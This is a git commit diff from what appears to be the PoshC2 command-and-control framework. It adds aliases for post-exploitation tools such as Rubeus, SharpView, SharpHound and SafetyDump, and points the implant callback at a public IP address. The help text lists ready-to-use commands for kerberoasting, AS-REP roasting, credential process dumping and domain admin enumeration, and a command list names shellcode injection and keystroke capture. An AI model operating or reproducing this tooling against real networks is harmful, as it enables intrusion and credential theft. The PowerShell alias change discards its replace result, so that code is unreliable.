Add aliases for common sharp commands

dev
m0rv4i 2019-04-30 15:19:25 +01:00
parent 56ed8c6ee1
commit 6fc1980a2d
7 changed files with 58 additions and 45 deletions

View File

@ -14,6 +14,15 @@ py_alias = [
# C# Implant
cs_alias = [
["s","get-screenshot"],
["safetydump", "run-exe SafetyDump.Program SafetyDump"],
["seatbelt", "run-exe Seatbelt.Program Seatbelt all"]
]
# Parts of commands to replace if command starts with the key
cs_replace = [
["safetydump", "run-exe SafetyDump.Program SafetyDump"],
["sharpup", "run-exe SharpUp.Program SharpUp"],
["seatbelt", "run-exe Seatbelt.Program Seatbelt"],
["rubeus", "run-exe Rubeus.Program Rubeus"],
["sharpview", "run-exe SharpView.Program SharpView"],
["sharphound", "run-exe Sharphound2.Sharphound Sharphound"],
["watson", "run-exe Watson.Program Watson"]
]

View File

@ -132,4 +132,10 @@ def run_autoloads(command, randomuri, user):
if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user)
if command.lower().strip().startswith("seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
if command.lower().strip().startswith("run-exe seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
if command.lower().strip().startswith("run-exe sharpup"): check_module_loaded("SharpUp.exe", randomuri, user)
if command.lower().strip().startswith("run-exe safetydump"): check_module_loaded("SafetyDump.exe", randomuri, user)
if command.lower().strip().startswith("run-exe rubeus"): check_module_loaded("Rubeus.exe", randomuri, user)
if command.lower().strip().startswith("run-exe sharpview"): check_module_loaded("SharpView.exe", randomuri, user)
if command.lower().strip().startswith("run-exe watson"): check_module_loaded("Watson.exe", randomuri, user)
if command.lower().strip().startswith("run-exe sharphound"): check_module_loaded("SharpHound.exe", randomuri, user)

View File

@ -7,7 +7,7 @@ PORT_NUMBER = 443 # This is the bind port
POSHDIR = "/opt/PoshC2_Python/"
ROOTDIR = "/opt/PoshC2_Project/"
HostnameIP = "https://192.168.233.1"
HostnameIP = "https://193.36.15.234"
DomainFrontHeader = "" # example df.azureedge.net
DefaultSleep = "5s"
Jitter = 0.20

61
Help.py
View File

@ -69,7 +69,6 @@ help
searchhelp listmodules
label-implant <newlabel>
back
safetydump
Migration
===========
@ -87,49 +86,38 @@ stop-keystrokes
testadcredential domain username password
testlocalcredential username password
cred-popper
loadmodule SharpUp.exe
run-exe SharpUp.Program SharpUp
sharpup
seatbelt all
seatbelt BasicOSInfo
seatbelt SysmonConfig
seatbelt PowerShellSettings
seatbelt RegistryAutoRuns
watson
Privilege Escalation:
=======================
seatbelt
loadmodule Seatbelt.exe
run-exe Seatbelt.Program Seatbelt all
run-exe Seatbelt.Program Seatbelt BasicOSInfo
run-exe Seatbelt.Program Seatbelt SysmonConfig
run-exe Seatbelt.Program Seatbelt PowerShellSettings
run-exe Seatbelt.Program Seatbelt RegistryAutoRuns
Credentials / Tokens / Local Hashes (Must be SYSTEM):
=========================================================
Process Dumping:
================
safetydump
safetydump <pid>
Network Tasks / Lateral Movement:
====================================
loadmodule Rubeus.exe
run-exe Rubeus.Program Rubeus kerberoast
run-exe Rubeus.Program Rubeus asreproast /user:username
Network Tasks / Lateral Movement:
====================================
loadmodule SharpView.exe
run-exe SharpView.Program SharpView Get-NetUser -SamAccountName ben
run-exe SharpView.Program SharpView Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
run-exe SharpView.Program SharpView Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
run-exe SharpView.Program SharpView Get-NetUser -Name deb -Domain blorebank.local
run-exe SharpView.Program SharpView Get-NetSession -Domain blorebank.local
run-exe SharpView.Program SharpView Get-DomainController -Domain blorebank.local
run-exe SharpView.Program SharpView Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
run-exe SharpView.Program SharpView Get-DomainUser -AdminCount -Properties samaccountname
run-exe SharpView.Program SharpView Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
run-exe SharpView.Program Sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
run-exe SharpView.Program SharpView Find-InterestingDomainShareFile -ComputerName SERVER01
rubeus kerberoast
rubeus asreproast /user:username
sharpview Get-NetUser -SamAccountName ben
sharpview Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
sharpview Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
sharpview Get-NetUser -Name deb -Domain blorebank.local
sharpview Get-NetSession -Domain blorebank.local
sharpview Get-DomainController -Domain blorebank.local
sharpview Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
sharpview Get-DomainUser -AdminCount -Properties samaccountname
sharpview Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
sharpview Find-InterestingDomainShareFile -ComputerName SERVER01
Bloodhound:
=============
loadmodule SharpHound.exe
run-exe Sharphound2.Sharphound Sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
"""
posh_help1 = """
@ -462,4 +450,5 @@ SHARPCOMMANDS = ["get-userinfo","stop-keystrokes","get-keystrokes","delete","mov
"download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential",
"testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir",
"inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule",
"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump", "seatbelt"]
"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump", "seatbelt", "sharpup",
"sharphound", "rubeus", "sharpview", "watson"]

View File

@ -25,8 +25,8 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
# alias mapping
for alias in ps_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
if command.lower().strip().startswith(alias[0]):
command.replace(alias[0], alias[1])
# opsec failures
for opsec in ps_opsec:

View File

@ -1,9 +1,9 @@
import base64, re, traceback, os
from Alias import cs_alias
from Alias import cs_alias, cs_replace
from Colours import Colours
from Utils import randomuri, validate_sleep_time
from DB import new_task, update_sleep, update_label, unhide_implant, kill_implant, get_implantdetails, get_pid
from AutoLoads import check_module_loaded
from AutoLoads import check_module_loaded, run_autoloads
from Help import sharp_help1
from Config import ModulesDirectory, POSHDIR
from Core import readfile_with_completion
@ -20,6 +20,13 @@ def handle_sharp_command(command, user, randomuri, startup):
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
# alias replace
for alias in cs_replace:
if command.lower().strip().startswith(alias[0]):
command = command.replace(alias[0], alias[1])
run_autoloads(command, randomuri, user)
if "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string

View File

@ -16,6 +16,8 @@ Add NotificationsProjectName in Config.py which is displayed in notifications me
Add fpc script which searches the Posh DB for a particular command
Use pyreadline for Windows compatibility
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
Add Windows install script
Add aliases for common sharp modules
4.8 (13/02/19)
==============